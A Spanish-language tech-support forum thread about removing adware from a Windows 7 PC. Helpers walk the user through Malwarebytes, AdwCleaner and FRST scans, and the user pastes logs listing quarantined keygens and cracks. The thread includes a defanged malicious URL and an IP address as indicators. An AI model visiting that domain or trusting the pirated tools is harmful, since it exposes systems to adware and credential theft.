Apertura constante de pestañas en el navegador


#1

Primero que todo felicitaciones por la renovación del foro!

Recientemente descargué un juego de otra página diferente a la de confianza y tenía un paso que consistia en descargar un ejecutable para acceder al torrent, ya me suponia que ahí estaba la “sopresita”, conseguí lo que bucaba más el problema por el cual vengo hasta aquí.

Cada cierto tiempo, no se cuanto, se ejecuta el navegador, mozilla, o si ya está funcionando se abre una pestaña a la siguiente dirección:

http://my-secure[.]org/?ref=6003&co=CO&dd=6f03b1fc12b19b0aab91c24288)

El cual quiere descargar un ejecutable pero mozilla lo bloquea, la cuestion es que si estoy haciendo otra cosa esto lo interrumpe.

Junto a esto y lo que más me preocupa, es que las cuentas de gmail se salen solas y debo volver a ingresar, por supuesto esto no pasaba antes.

Creí que con pasarle el malwarebytes antimalware sería suficiente pero a resultado ser que no. Por lo que pido ayuda en este asunto, gracias por su atención.


#2

Saludos y [email protected] al nuevo Forospyware

Realiza los siguientes pasos, , sin cambiar el orden

1) Descarga, actualiza y ejecuta Malwarebytes’ Anti-Malware,

Manual Malwarebytes, para que sepas usarlo y configurarlo.

  • Realiza un Análisis Personalizado,marcando Todas las casillas de la derecha y de la Izquierda actualizando si te lo pide.
  • Pulsar en “Eliminar Seleccionados” para enviarlo a la cuarentena y Reinicias el sistema.
  • Para acceder posteriormente al informe del análisis : Informes >> Registro de análisis >> Pulsar en >> Exportar >> Copiar al Portapapeles, y lo pegas en tu respuesta

2) Descarga Adwcleaner en el escritorio.

  • Desactiva tu antivirus :arrow_forward:Como deshabilitar temporalmente un antivirus y cualquier programa de seguridad.

  • Ejecuta Adwcleaner.exe (Si usas Windows Vista/7 u 8 presiona clic derecho y selecciona "Ejecutar como Administrador.")

  • Pulsar en el botón Analizar Ahora, y espera a que se realice el proceso, inmediatamente pulsa sobre el botón Iniciar Reparacion.

  • Espera a que se complete y sigue las instrucciones, si te pidiera Reiniciar el sistema Aceptas.

  • Si no encuentra nada, pulsamos “Omitir Reparación

  • El log lo encontramos en la pestaña “Informes”, volviendo a abrir el programa, si es necesario o en"C:\AdwCleaner\Logs\AdwCleaner[C0].txt"

Puedes mirar su manual >> Manual de Adwcleaner

3) Descarga Ccleaner

Instalalo y ejecútalo. En la pestaña limpiador dejas como esta configurada predeterminadamente, haces clic en analizar esperas que termine > clic en ejecutar limpiador. Clic en la pestaña Registro > clic en buscar problemas esperas que termine > clic en Reparar Seleccionadas y haces una copia de seguridad.

Pega los reportes de Malwarebytes, AdwCleaner y comentas como va el problema.



#3

Disculpa por no responder pronto, ahor aque tengo tiempo he intentado descargar los programas recomendados pero siempre que en entro en la pagina de malwarebytes o tan solo en google busco malwarebytes el navegador y el PC entero se bloquea, lo unico que funciona es contral+ alt+ suprimir y reiniciar, ni siquiera el administrador de tareas me deja sacar, la pantalla se pone en negro si lo intento y no da más imagen. Será esto obra del virus? como que la cuestión es aún más complicada se me hace.

Seguiré intentando de no conseguirlo volveré a informar de lo contrario ya traeré los informes.


#4

Intenta hacerlo en Modo Seguro con Red


#5

registro malwarebytes:

Malwarebytes
www.malwarebytes.com

-Detalles del registro-
Fecha del análisis: 17/10/18
Hora del análisis: 12:43
Archivo de registro: 2abe3988-d234-11e8-8cce-000000000000.json

-Información del software-
Versión: 3.6.1.2711
Versión de los componentes: 1.0.463
Versión del paquete de actualización: 1.0.7403
Licencia: Prueba

-Información del sistema-
SO: Windows 7 Service Pack 1
CPU: x64
Sistema de archivos: NTFS
Usuario: Dango-PC\Dango

-Resumen del análisis-
Tipo de análisis: Análisis personalizado
Análisis iniciado por:: Manual
Resultado: Completado
Objetos analizados: 1101840
Amenazas detectadas: 47
Amenazas en cuarentena: 47
Tiempo transcurrido: 9 hr, 57 min, 53 seg

-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Activado
Heurística: Activado
PUP: Detectar
PUM: Detectar

-Detalles del análisis-
Proceso: 0
(No hay elementos maliciosos detectados)

Módulo: 0
(No hay elementos maliciosos detectados)

Clave del registro: 0
(No hay elementos maliciosos detectados)

Valor del registro: 1
Generic.Malware/Suspicious, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\SHAREDDLLS|C:\PROGRAM FILES\SOLIDWORKS CORP\SOLIDWORKS ELECTRICAL\REDIST\PDFCREATOR-1_2_3_SETUP.EXE, En cuarentena, [0], [392686],1.0.7403

Datos del registro: 0
(No hay elementos maliciosos detectados)

Secuencia de datos: 0
(No hay elementos maliciosos detectados)

Carpeta: 1
PUP.Optional.ForcedInstalledExtensionFF, C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\browser-extension-data\{56a1e8d2-3ced-4919-aca5-ddd58e0f31ef}, En cuarentena, [1701], [580170],1.0.7403

Archivo: 45
PUP.Optional.ForcedInstalledExtensionFF, C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\browser-extension-data\{56a1e8d2-3ced-4919-aca5-ddd58e0f31ef}\storage.js, En cuarentena, [1701], [580170],1.0.7403
Trojan.Waldek, G:\USBFIX\QUARANTINE\H\ \-_--_-_--_-__-_--_--_-__-_-__-_--_--_.{3EC6593E-27A1-44B6-87D3-ADD9629D40EA}.VIR, En cuarentena, [8669], [364189],1.0.7403
RiskWare.GameHack, F:\RISE RAJAS\AGE OF EMPIRES II HD\STEAM_APIRAJAS.DLL, En cuarentena, [7832], [305544],1.0.7403
RiskWare.GameHack, E:\DATA\DOCUMENTOS\DESCARGAS\COMPRESSED\AGFEII-TRR-RLD-PGME\AGE.OF.EMPIRES.II.HD.THE.RISE.OF.THE.RAJAS-RELOADED\RLD-AOE2HDRAJAS-COMPUCALITV\CRACK\STEAM_APIRAJAS.DLL, En cuarentena, [7832], [305544],1.0.7403
PUP.Optional.IntroKeygen, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\MALWAREBYTES ANTI-MALWARE\MALWAREBYTES.ANTI-MALWARE.PREMIUM.V2.2.0.1024.MULTILINGUAL.FINAL.INCL.KEYMAKER-FFF\KEYGEN' S\MALWAREBYTES.ANTI-MALWARE.V1.50.KEYMAKER-CORE.RAR, En cuarentena, [13689], [279993],1.0.7403
RiskWare.Tool.CK, E:\DATA\DOCUMENTOS\PROGRAMAS\ALCOHOL 120%\ALCOHOL 120% WINDOWS 7\ALCOHOL-120-V2.0.2.4713-FINAL-RETAIL.RAR, En cuarentena, [5791], [137312],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\BURLADOR DE SEGURIDAD INTERNET\U998.EXE, En cuarentena, [0], [392686],1.0.7403
RiskWare.DontStealOurSoftware, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\MALWAREBYTES ANTI-MALWARE\MALWAREBYTES.ANTI-MALWARE.PREMIUM.V2.2.0.1024.MULTILINGUAL.FINAL.INCL.KEYMAKER-FFF\KEYGEN' S\KEYGEN-PTRICK\PATRICK.EXE, En cuarentena, [5335], [278514],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\ESET NOD 32\ESET NOD32 VER7 X64\ACTIVACION PERMANENTE\CRACK ESET FIX\ESET FIX.EXE, En cuarentena, [0], [392686],1.0.7403
RiskWare.DontStealOurSoftware, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\MALWAREBYTES ANTI-MALWARE\MALWAREBYTES.ANTI-MALWARE.PREMIUM.V2.2.0.1024.MULTILINGUAL.FINAL.INCL.KEYMAKER-FFF\KEYGEN' S\MALWAREBYTES_.ANTI-MALWARE.V1.46.KEYGENERATOR-INF.ZIP, En cuarentena, [5335], [145079],1.0.7403
RiskWare.Tool.HCK, E:\DATA\DOCUMENTOS\PROGRAMAS\AUTODESK\AUTODESK INVENTOR PRO 2015 X64\XF-ADSK2015_X64.7Z, En cuarentena, [7792], [65468],1.0.7403
RiskWare.DontStealOurSoftware, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\MALWAREBYTES ANTI-MALWARE\MALWAREBYTES.ANTI-MALWARE.PREMIUM.V2.2.0.1024.MULTILINGUAL.FINAL.INCL.KEYMAKER-FFF\KEYGEN' S\MALWAREBYTES.ANTI-MALWARE.1.50.READNFO_KEYGEN-FFF.ZIP, En cuarentena, [5335], [278517],1.0.7403
RiskWare.Tool.HCK, E:\DATA\DOCUMENTOS\PROGRAMAS\DISEñO Y ANIMACION\AUTODESK MAYA 3D 2014\ACTIVAR AUTODESK MAYA 3D 2014\CRACK-WIN\XF-ADSK64.7Z, En cuarentena, [7792], [65468],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\DISEñO Y ANIMACION\ANIME STUDIO +PRO11\ANIME STUDIO 10 PRO\CRACK\XF-SASPRO10.7Z, En cuarentena, [0], [392686],1.0.7403
RiskWare.Tool.CK, E:\DATA\DOCUMENTOS\PROGRAMAS\ALCOHOL 120%\ALCOHOL 120% WINDOWS 7\ALCOHOL-120-V2.0.2.4713-FINAL-RETAIL\ALCOHOL-120-V2.0.2.4713-FINAL-RETAIL\KEYMAKER.RAR, En cuarentena, [5791], [137312],1.0.7403
RiskWare.DontStealOurSoftware, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\MALWAREBYTES ANTI-MALWARE\MALWAREBYTES.ANTI-MALWARE.PREMIUM.V2.2.0.1024.MULTILINGUAL.FINAL.INCL.KEYMAKER-FFF\KEYGEN' S\MALWAREBYTES.ANTI-MALWARE.V1.50B.KEYGEN-RED.ZIP, En cuarentena, [5335], [278516],1.0.7403
PUP.Optional.TenkiTechnology, E:\DATA\DOCUMENTOS\PROGRAMAS\CAMBIAR IP\PLATINUM-HIDE-IP-3.2.9.8-FULL.RAR, En cuarentena, [13913], [272964],1.0.7403
RiskWare.DontStealOurSoftware, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\MALWAREBYTES ANTI-MALWARE\MALWAREBYTES.ANTI-MALWARE.PREMIUM.V2.2.0.1024.MULTILINGUAL.FINAL.INCL.KEYMAKER-FFF\KEYGEN' S\MALWAREBYTES.ANTI-MALWARE.V1.3.X.KEYGEN-CORE.RAR, En cuarentena, [5335], [278514],1.0.7403
CrackTool.FFFTeam.Keygen, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\MALWAREBYTES ANTI-MALWARE\MALWAREBYTES.ANTI-MALWARE.PREMIUM.V2.2.0.1024.MULTILINGUAL.FINAL.INCL.KEYMAKER-FFF\KEYGEN' S\2.0 KEYGEN-FFF.ZIP, En cuarentena, [11300], [106739],1.0.7403
PUP.Optional.PasswordViewer, E:\DATA\DOCUMENTOS\PROGRAMAS\CONTRASEñAS GUARDADAS REVELADOR\IEPV.ZIP, En cuarentena, [7870], [299461],1.0.7403
RiskWare.Tool.HCK, E:\DATA\DOCUMENTOS\PROGRAMAS\DISEñO Y ANIMACION\AUTODESK MAYA 3D 2014\ACTIVAR AUTODESK MAYA 3D 2014\CRACK-WIN\XF-ADSK32.7Z, En cuarentena, [7792], [65468],1.0.7403
RiskWare.Tool.HCK, E:\DATA\DOCUMENTOS\PROGRAMAS\AUTODESK\AUTODESK INVENTOR PRO 2015 X64\XF-ADSK2015_X86.7Z, En cuarentena, [7792], [65468],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\DISEñO Y ANIMACION\MANGA STUDIO\MANGA STUDIO 5 EX\CRACK\XF-SMS504EX.7Z, En cuarentena, [0], [392686],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\DRIVERS\DLL FALTANTES\DLL FILE FIXER\KEYGEN\DLL-FILES FIXER KEYGEN.EXE, En cuarentena, [0], [392686],1.0.7403
PUP.Optional.OpenCandy, E:\DATA\DOCUMENTOS\PROGRAMAS\GOM PLAYER\GOMPLAYERENSETUP.EXE, En cuarentena, [1064], [297667],1.0.7403
RiskWare.Tool.CK, E:\DATA\DOCUMENTOS\PROGRAMAS\MICROSOFT OFFICE\MICROSOFT OFFICE 2010\EVOACTIVACIONOFFICE2010.EXE, En cuarentena, [5791], [144333],1.0.7403
PUP.Optional.OpenCandy, E:\DATA\DOCUMENTOS\PROGRAMAS\PRIMO PDF\VERSION ULTIMATE\INTERNATIONALPRIMOPDF.EXE, En cuarentena, [1064], [297667],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\NITRO PDF READER\NITRO PDF READER PROFESSIONAL\NITRO PRO V10.5.5.29 FINAL X64\KEYGEN\KEYGEN\KEYGEN NITRO PRO V10.5.5.29 FINAL.EXE, En cuarentena, [0], [392686],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\NITRO PDF READER\NITRO PDF READER PROFESSIONAL\NITRO PRO V10.5.5.29 FINAL X64\KEYGEN.RAR, En cuarentena, [0], [392686],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\NITRO PDF READER\NITRO PDF READER PROFESSIONAL\NITRO PRO V10.5.5.29 FINAL X86\KEYGEN.RAR, En cuarentena, [0], [392686],1.0.7403
PUP.Optional.OpenCandy, E:\DATA\DOCUMENTOS\PROGRAMAS\PRIMO PDF\INTERNATIONALPRIMOPDF.EXE, En cuarentena, [1064], [297667],1.0.7403
RiskWare.CRK, E:\DATA\DOCUMENTOS\PROGRAMAS\MICROSOFT PROJECT PRO 2010 ESPANOL\ACTIVADOR  OFFICE 2010\MINI-KMS_ACTIVATOR_V1.2_OFFICE2010_VL_ENG.EXE, En cuarentena, [8819], [76205],1.0.7403
PUP.Optional.SofTonic, E:\DATA\DOCUMENTOS\PROGRAMAS\PC INSPECTOR SMART RECOVERY\DOWNLOADER PC INSPECTOR SMART RECOVERY\SOFTONICDOWNLOADER_PARA_PC-INSPECTOR-SMART-RECOVERY.EXE, En cuarentena, [1869], [77251],1.0.7403
PUP.Optional.InstallCore, E:\DATA\DOCUMENTOS\PROGRAMAS\CHEAT ENGINE\CHEATENGINE63.EXE, En cuarentena, [402], [500846],1.0.7403
PUP.Optional.OfferBundler.ST, E:\DATA\DOCUMENTOS\PROGRAMAS\HACHA\HACHA DOWNLOADER\SOFTONICDOWNLOADER_PARA_HACHA.EXE, En cuarentena, [12724], [86086],1.0.7403
PUP.Optional.RegCleanPro, E:\DATA\DOCUMENTOS\PROGRAMAS\REGCLEAN PRO\SYSRC_TRIAL_9407_SPANISH.EXE, En cuarentena, [1673], [495008],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\SISTEMAS OPERATIVOS\WINDOWS\LEGALIZADOR SISTEMAS OPERATIVOS\LEGALIZADOR WINDOWS 7\VALIDAR WINDOWS 7\WINDOWS7_LOADER_V1.77.RAR, En cuarentena, [0], [392686],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\SISTEMAS OPERATIVOS\WINDOWS\LEGALIZADOR SISTEMAS OPERATIVOS\LEGALIZADOR WINDOWS 7\VALIDAR WINDOWS 7 EJECUTABLE\WINDOWS 7 LOADER.EXE, En cuarentena, [0], [392686],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\SISTEMAS OPERATIVOS\WINDOWS\LEGALIZADOR SISTEMAS OPERATIVOS\LEGALIZADOR WINDOWS 7\VALIDAR WINDOWS 7 EJECUTABLE\WINDOWS7_LOADER_V1.77.RAR, En cuarentena, [0], [392686],1.0.7403
HackTool.Agent, E:\DATA\DOCUMENTOS\PROGRAMAS\SISTEMAS OPERATIVOS\WINDOWS\LEGALIZADOR SISTEMAS OPERATIVOS\LEGALIZADOR WINDOWS 7\LOADER 2.2.2\WDS LDR V2.2.2 FINAL\WDS LDR V2.2.2 FINAL\WINDOWS LOADER V2.2.2 BY DAZ\WINDOWS LOADER V2.2.2 BY DAZ\WINDOWS LOADER.EXE, En cuarentena, [3928], [563681],1.0.7403
HackTool.Agent, E:\DATA\DOCUMENTOS\PROGRAMAS\SISTEMAS OPERATIVOS\WINDOWS\LEGALIZADOR SISTEMAS OPERATIVOS\LEGALIZADOR WINDOWS 7\LOADER 2.2.2\WDS LDR V2.2.2 FINAL\WDS LDR V2.2.2 FINAL\WINDOWS LOADER V2.2.2 BY DAZ\WINDOWS LOADER V2.2.2 BY DAZ.RAR, En cuarentena, [3928], [563681],1.0.7403
PUP.Optional.SofTonic, E:\DATA\DOCUMENTOS\PROGRAMAS\TROJAN REMOVER\DOWNLOADER TROJAN REMOVER\SOFTONICDOWNLOADER_PARA_TROJAN-REMOVER.EXE, En cuarentena, [1869], [77251],1.0.7403
Generic.Malware/Suspicious, C:\PROGRAM FILES (X86)\FREEMAKE\FREEMAKE VIDEO CONVERTER\SETUPUPDATE.EXE, En cuarentena, [0], [392686],1.0.7403
Generic.Malware/Suspicious, C:\PROGRAM FILES\SOLIDWORKS CORP\SOLIDWORKS ELECTRICAL\REDIST\PDFCREATOR-1_2_3_SETUP.EXE, En cuarentena, [0], [392686],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\ANDROID\EASEUS PARTITION MASTER\KEYGEN.EXE, En cuarentena, [0], [392686],1.0.7403

Sector físico: 0
(No hay elementos maliciosos detectados)

WMI: 0
(No hay elementos maliciosos detectados)


(end)

Registro Adwcleaner:

-------------------------------

Malwarebytes AdwCleaner 7.2.4.0

-------------------------------

Database: 2018-10-12.1 (Cloud) Support: https://www.malwarebytes.com/support

-------------------------------

Mode: Scan

Start: 10-17-2018 Duration: 00:00:11 OS: Windows 7 Ultimate Scanned: 31969 Detected: 0

***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

No malicious folders found.

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

No malicious registry entries found.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries found.

***** [ Chromium URLs ] *****

No malicious Chromium URLs found.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.

AdwCleaner[S00].txt - [3968 octets] - [04/10/2018 22:03:59] AdwCleaner[C00].txt - [3565 octets] - [04/10/2018 22:04:32]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S01].txt ##########

Malware bloqueo la pestaña emergente y aquí subo el informe, la pestaña sale aún despues de haber esperado como 9 horas mientras hacia el analisis:

Malwarebytes

-Detalles del registro- Fecha del evento de protección: 17/10/18 Hora del evento de protección: 23:04 Archivo de registro: ddb3c624-d28a-11e8-9891-000000000000.json

-Información del software- Versión: 3.6.1.2711 Versión de los componentes: 1.0.463 Versión del paquete de actualización: 1.0.7407 Licencia: Prueba

-Información del sistema- SO: Windows 7 Service Pack 1 CPU: x64 Sistema de archivos: NTFS Usuario: System

-Detalles del sitio web bloqueado- Sitio web malicioso: 1 , , Bloqueado, [-1], [-1],0.0.0

-Datos de sitio web- Categoría: PUP Dominio:EDITADO******** Dirección IP: 185.71.67.6 Puerto: [49193] Tipo: Saliente Archivo: C:\Program Files (x86)\Mozilla Firefox\firefox.exe

(end)


#6

Primeramente…lo que tienes es un problema de uso del pc. pues tienes colección de Keygens en el pc, includi pirateado el Malwarebytyes y eso amigo :-1:

Lo del aviso que me pones,has entrado tu en esa pagina bloqueada a posta o sale sin mas, navegado normalmente?


#7

Todos esos keygen son sumamente viejos, los tengo de hace años y nunca me han dado problema. El keygen del malware mejor si lo borraré. El proceso de analisis lo hice con el malwarebytes en limpio, nada trucado.

Esa es la página que se abre sola intrusivamente, nunca he entrado a posta y sale navegando normalmente.

Ahora desde hace un par de días el PC se está apagando solo sin dar aviso, creí que era por temperatura y usé el open hardware monitor, aún creo que es más por el virus o lo que tenga:

La medición la tome encendiendo nuevamente el PC justo depués de que se apagara de improvisto.


#8
  • Desactiva Temporalmente tu antivirus y cualquier programa de seguridad.

  • Descarga a Tu Escritorio >> Esto es muy importante<<.,Fabar Recovery Scan Tool, considerando la versión adecuada para tu equipo. (32 o 64 bits) :arrow_forward: ¿Cómo saber si mi Windows es de 32 o 64 bits?

  • Doble clic para ejecutar Frst.exe. En la ventana del Disclaimer, presiona Yes.

  • En la nueva ventana que se abre, presiona el botón Scan y espera a que concluya el análisis.

  • Se abrirán dos (2) archivos (Logs), Frst.txt y Addition.txt, que estarán grabados en Tu escritorio.

En Tu próxima respuesta, copias y pegas los dos reportes Frst.txt y Addition.txt de FRST

Nota: Si el/los reportes solicitados no entraran en una sola respuesta porque superan la cantidad de caracteres permitidos, puedes utilizar dos o mas respuestas para pegarlos completamente.


#9

Frst:

 Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 10.10.2018
Ran by Dango (administrator) on DANGO-PC (18-10-2018 13:43:34)
Running from C:\Users\Dango\Desktop
Loaded Profiles: Dango (Available Profiles: Dango & DefaultAppPool)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: Español (España, internacional)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Trace Software International) C:\Program Files\SolidWorks Corp\SolidWorks Electrical\server\EwServer.exe
(Microsoft Corporation) C:\Windows\System32\inetsrv\inetinfo.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Nitro PDF Software) C:\Program Files\Nitro\Pro 10\NitroPDFDriverService10x64.exe
() C:\Program Files\Nitro\Pro 10\Nitro_UpdateService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(StarWind Software) C:\Program Files (x86)\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
(TuneUp Software) C:\Program Files (x86)\TuneUp Utilities 2014\TuneUpUtilitiesService64.exe
() C:\Program Files\802.11 Wireless LAN\802.11n Wireless USB Adapter HW.17\WlanWpsSvc.exe
(TuneUp Software) C:\Program Files (x86)\TuneUp Utilities 2014\TuneUpUtilitiesApp64.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\Windows\System32\mqtgsvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

IFEO\ccd-uninst.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\clonecd.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\clonecdtray.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\databasecompare.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\dtagent.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\dtlauncher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\excel.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\fahconsole.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\helplauncher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\nitropdf.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\powerpnt.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\regclonecd.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\spreadsheetcompare.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\winword.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\winzip64.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzbgtools.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzpreloader.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzupdatenotifier.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 190.157.8.33 190.157.8.1
Tcpip\..\Interfaces\{6212BD7F-11F2-4D52-AEAE-C06BDAB0FAA7}: [NameServer] 8.8.8.8,8.8.4.4,192.168.0.1
Tcpip\..\Interfaces\{6212BD7F-11F2-4D52-AEAE-C06BDAB0FAA7}: [DhcpNameServer] 190.157.8.33 190.157.8.1
Tcpip\..\Interfaces\{70239047-0E28-4EAB-B705-B92BCBC8E137}: [NameServer] 156.154.70.22,156.154.71.22,192.168.0.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/es-co/?ocid=iehp
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2016-12-10] (Internet Download Manager, Tonec Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2016-12-10] (Internet Download Manager, Tonec Inc.)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\ssv.dll [2017-08-04] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-04] (Oracle Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2012-10-01] (Microsoft Corporation)
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 -  No File
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF DefaultProfile: r533z996.default
